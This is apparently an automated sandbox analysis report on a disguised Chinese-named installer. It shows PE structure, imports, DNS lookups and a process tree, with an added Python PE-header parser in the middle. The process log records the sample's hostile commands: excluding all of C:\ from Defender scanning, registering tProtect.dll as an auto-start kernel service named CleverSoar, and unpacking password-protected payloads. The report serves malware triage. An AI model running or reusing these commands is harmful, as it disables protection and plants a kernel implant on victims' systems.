IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0xcb000 | 0x11000 | 0x11000 | 8d101b7c7b614b140e68d57e4bcf7223 | False | 0.18781594669117646 | data | 3.7235859696272633 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2776203966005666
RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
DLL | Imports
kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll | InitCommonControls
user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
Name | Ordinal | Address
__dbk_fcall_wrapper | 2 | 0x40fc10
dbkFCallWrapperAddr | 1 | 0x4b063c
Language of compilation system | Country where language is spoken
English | United States
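The section table, entrypoint and compile timestamp above are the first things a static triage pass checks, and they are easy to cross-check by hand. The following is an added example, not code from the Joe Sandbox report or from the sample: a small PE header parser that recovers the TimeDateStamp, finds which section contains AddressOfEntryPoint, and lists any section mapped both writable and executable. It runs offline against a constructed, headers-only PE32 image whose section names, RVAs, sizes, characteristics, entrypoint and timestamp are copied from the report; `build_test_pe`, `parse_pe`, `entrypoint_section` and `writable_executable` are names chosen for this example.

```python
"""Parse a PE section table and sanity-check the entrypoint (added example)."""
import struct
from dataclasses import dataclass
from datetime import datetime, timezone

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


@dataclass
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    characteristics: int

    def contains_rva(self, rva):
        end = self.virtual_address + max(self.virtual_size, self.raw_size)
        return self.virtual_address <= rva < end


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:        # PE32: 32-bit ImageBase at offset 28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:      # PE32+: 64-bit ImageBase at offset 24 (no BaseOfData field)
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    sections, off = [], opt + opt_size
    for _ in range(nsec):
        name, vsize, va, rawsize, _, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append(Section(name.rstrip(b"\0").decode(), va, vsize, rawsize, chars))
        off += 40
    return {"machine": machine, "timestamp": stamp, "entrypoint_rva": entry,
            "image_base": image_base, "sections": sections}


def compile_time(info):
    return datetime.fromtimestamp(info["timestamp"], tz=timezone.utc)


def entrypoint_section(info):
    """Name of the section holding AddressOfEntryPoint, or None if it lies outside every section."""
    for s in info["sections"]:
        if s.contains_rva(info["entrypoint_rva"]):
            return s.name
    return None


def writable_executable(info):
    """Sections mapped both writable and executable: a common packer / self-modifying-code tell."""
    wx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    return [s.name for s in info["sections"] if s.characteristics & wx == wx]


def build_test_pe(sections, entrypoint_rva, image_base, timestamp):
    """Constructed headers-only PE32 so the parser runs offline; these are not the sample's bytes."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    opt_size = 0xE0                                                  # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entrypoint_rva)
    struct.pack_into("<I", opt, 28, image_base)
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", s.name.encode(), s.virtual_size, s.virtual_address,
                                s.raw_size, 0, 0, 0, 0, 0, s.characteristics) for s in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + hdrs


CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
RO = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
RW = RO | IMAGE_SCN_MEM_WRITE
# Section layout copied from the report's section table (names, RVAs, sizes, flags).
REPORT_SECTIONS = [
    Section(".text", 0x1000, 0xa568c, 0xa5800, CODE),
    Section(".itext", 0xa7000, 0x1b64, 0x1c00, CODE),
    Section(".data", 0xa9000, 0x3838, 0x3a00, RW),
    Section(".bss", 0xad000, 0x7258, 0x0, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    Section(".idata", 0xb5000, 0xfec, 0x1000, RW),
    Section(".didata", 0xb6000, 0x1a4, 0x200, RW),
    Section(".edata", 0xb7000, 0x71, 0x200, RO),
    Section(".tls", 0xb8000, 0x18, 0x0, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    Section(".rdata", 0xb9000, 0x5d, 0x200, RO),
    Section(".reloc", 0xba000, 0x10fa8, 0x11000, RO | IMAGE_SCN_MEM_DISCARDABLE),
    Section(".rsrc", 0xcb000, 0x11000, 0x11000, RO),
]
# Entrypoint 0x4a83bc with Imagebase 0x400000 gives RVA 0xa83bc; timestamp 0x6690DABD; both from the report.
TEST_IMAGE = build_test_pe(REPORT_SECTIONS, 0x4a83bc - 0x400000, 0x400000, 0x6690DABD)

if __name__ == "__main__":
    info = parse_pe(TEST_IMAGE)
    print("compiled:", compile_time(info).isoformat())
    print("entrypoint in:", entrypoint_section(info))
    print("W+X sections:", writable_executable(info))
```

Run against the constructed image, the entrypoint resolves to .itext, matching the "Entrypoint Section" field above, no section is writable and executable, and the timestamp decodes to 2024-07-12 07:26:53 UTC as the report states. That is a normal layout for the Inno Setup stub TrID identifies; an entrypoint outside every section or in a W+X section would be the thing to flag. The dropped payloads are what deserve the closer look here, not this stub.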
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 24, 2024 05:02:00.176995039 CET | 1.1.1.1 | 192.168.2.4 | 0x5213 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 05:02:00.176995039 CET | 1.1.1.1 | 192.168.2.4 | 0x5213 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.99 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 05:02:00.176995039 CET | 1.1.1.1 | 192.168.2.4 | 0x5213 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.98 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 05:02:00.176995039 CET | 1.1.1.1 | 192.168.2.4 | 0x5213 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.100 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 05:02:00.176995039 CET | 1.1.1.1 | 192.168.2.4 | 0x5213 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.101 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 05:02:06.823213100 CET | 1.1.1.1 | 192.168.2.4 | 0x8754 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 05:02:06.823213100 CET | 1.1.1.1 | 192.168.2.4 | 0x8754 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.101 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 05:02:06.823213100 CET | 1.1.1.1 | 192.168.2.4 | 0x8754 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.99 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 05:02:06.823213100 CET | 1.1.1.1 | 192.168.2.4 | 0x8754 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.98 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 05:02:06.823213100 CET | 1.1.1.1 | 192.168.2.4 | 0x8754 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.100 | A (IP address) | IN (0x0001) | false


                            Target ID:0
                            Start time:23:01:40
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
                            Imagebase:0x5c0000
                            File size:5'986'125 bytes
                            MD5 hash:315719354DB8520278AE3D022B90DA14
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:1
                            Start time:23:01:40
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$1043E,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
                            Imagebase:0xb0000
                            File size:3'366'912 bytes
                            MD5 hash:FFE4B45A6AE66BCB0FA01197725E2E27
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:23:01:41
                            Start date:23/12/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:3
                            Start time:23:01:41
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:23:01:44
                            Start date:23/12/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff693ab0000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:5
                            Start time:23:01:49
                            Start date:23/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
                            Imagebase:0x5c0000
                            File size:5'986'125 bytes
                            MD5 hash:315719354DB8520278AE3D022B90DA14
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:false

                            Target ID:6
                            Start time:23:01:49
                            Start date:23/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$100214,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
                            Imagebase:0x7ff70f330000
                            File size:3'366'912 bytes
                            MD5 hash:FFE4B45A6AE66BCB0FA01197725E2E27
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:7
                            Start time:23:01:51
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:23:01:51
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):true
                            Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x580000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:23:01:51
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                            Imagebase:0x6b0000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
• Detection: 0%, Virustotal
                            Reputation:moderate
                            Has exited:true

                            Target ID:10
                            Start time:23:01:51
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:11
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:12
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                            Imagebase:0x6b0000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:13
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:14
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:15
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:23:01:52
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:23:01:53
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
